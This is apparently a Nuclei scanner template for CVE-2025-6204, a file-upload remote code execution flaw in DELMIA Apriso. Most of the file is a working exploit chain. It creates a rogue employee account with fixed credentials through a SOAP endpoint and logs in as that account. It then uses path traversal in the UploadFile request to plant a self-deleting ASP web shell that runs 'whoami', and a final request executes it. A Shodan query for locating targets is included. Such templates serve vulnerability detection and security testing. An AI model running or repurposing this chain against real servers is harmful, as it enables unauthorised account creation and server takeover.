id: CVE-2025-6204
info:
name: DELMIA Apriso - Command Injection
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.
remediation: |
Apply security patches from DELMIA for Release 2020 through Release 2025 to implement proper file upload validation and path canonicalization.
impact: |
Authenticated attackers can upload executable files through path traversal to achieve remote code execution on DELMIA Apriso servers.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-6204
- https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6204
- https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso
metadata:
verified: true
max-request: 5
shodan-query: title:"DELMIA Apriso"
classification:
cve-id: CVE-2025-6204
epss-score: 0.10184
epss-percentile: 0.9332
cwe-id: CWE-94
cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
cvss-score: 9.0
tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive,vuln,kev,vkev
flow: http(1) && http(2) && http(3) && http(4) && http(5)
variables:
filename: "{{randbase(5)}}"
username: "LAST"
password: "9"
http:
- raw:
- |-
POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=utf-8
Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"
<FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0">
<Employee>
<GivenName>FIRST</GivenName>
<FamilyName>LAST</FamilyName>
<EmployeeNo>08262004</EmployeeNo>
<LoginName>{{username}}</LoginName>
<Password>{{password}}</Password>
<HireDate>2000-06-01T00:00:00</HireDate>
<SpokenLanguageID>1033</SpokenLanguageID>
<WrittenLanguageID>1033</WrittenLanguageID>
<EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate>
<LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate>
<EmployeeType>0</EmployeeType>
<DefaultFacility>C1P1</DefaultFacility>
<TrackLaborFlag>true</TrackLaborFlag>
<ResourceID NodeType="Field">
<Resource_Insert>
<Name>FIRST</Name>
<ResourceName>FIRST</ResourceName>
<ResourceType>1</ResourceType>
<FUID NodeType="Field"/>
</Resource_Insert>
</ResourceID>
<EmployeeRole>
<EmployeeID NodeType="Field"/>
<RoleID NodeType="Field">
<Role>
<Role>Production User</Role>
</Role>
</RoleID>
</EmployeeRole>
</Employee>
</FlexNet_Employees>
myExternalApplication
matchers:
- type: word
part: body
words:
- ProcessMessageASync_v2Response
- true
condition: and
internal: true
- raw:
- |
GET /Apriso/Portal/Kiosk/Login.aspx HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
name: viewstate
group: 1
regex:
- '__VIEWSTATE" value="(.*?)"'
internal: true
- type: regex
part: body
name: eventval
group: 1
regex:
- '__EVENTVALIDATION" value="(.*?)"'
internal: true
- type: regex
part: body
name: viewgen
group: 1
regex:
- '__VIEWSTATEGENERATOR" value="(.*?)"'
internal: true
- raw:
- |-
POST /Apriso/Portal/Kiosk/Login.aspx?BackToStartPage=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewgen}}&__EVENTVALIDATION={{urlencode(eventval)}}&ctl04%24LoginTextBox={{username}}&ctl04%24PasswordTextbox={{password}}&ctl04%24LogInButton=Log+In&ctl04%24HiddenValue=Initial+Value&ctl04%24HiddenValue2=Initial+Value
matchers:
- type: dsl
dsl:
- status_code == 302
internal: true
# Self-deleteable ASP POC File
- raw:
- |
POST /Apriso/webservices/1.1/operation.svc/UploadFile?filename=375c9638-1a4e-465d-90d7-f69321315acb-xxx\..\..\..\portal\Uploads\{{filename}}.asp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
<%
Response.Write "{{randstr}}" & "
"
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
Set fso = Server.CreateObject("Scripting.FileSystemObject")
fso.DeleteFile Server.MapPath(Request.ServerVariables("SCRIPT_NAME")), True
Set fso = Nothing
%>
matchers:
- type: word
part: body
words:
- Uploads
- ResultMessage
- FilePath
- Success
- "{{filename}}.asp"
condition: and
internal: true
- raw:
- |
GET /Apriso/Portal/Uploads/{{filename}}.asp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "{{randstr}}"
extractors:
- type: regex
group: 1
regex:
-
(.*)
# digest: 490a00463044022033f49e117aa08ba5e980fc2f4bec395a9b4548b131a58e7df61bd2376f63224c022034d38adcafda8610b6a147d319a7d4431d13dd178c8a4e87a9dd7fe81fb31b48:922c64590222798bb761d5b6d8e72950